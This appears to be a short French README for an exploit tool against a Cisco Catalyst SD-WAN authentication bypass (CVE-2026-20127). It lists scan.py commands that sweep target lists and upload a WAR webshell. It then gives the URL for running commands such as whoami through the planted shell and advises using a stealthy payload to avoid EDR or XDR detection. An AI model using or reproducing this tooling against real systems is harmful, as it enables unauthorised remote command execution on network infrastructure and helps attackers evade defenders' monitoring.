
Exploit de contournement d'authentification Cisco Catalyst SD-WAN (CVE-2026-20127)
Exploit EXP pour la vulnérabilité de contournement d'authentification Cisco Catalyst SD-WAN (CVE-2026-20127)
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
Après une reproduction réussie de la vulnérabilité, accédez à /cmd.gz/cmd.jsp?cmd=whoami pour afficher le résultat sur la page.
Si vous souhaitez utiliser un webshell à la place, créez votre propre package WAR (il est recommandé d'utiliser une charge utile furtive, car des tests ont montré que les systèmes Windows peuvent disposer d'un EDR ou d'un XDR).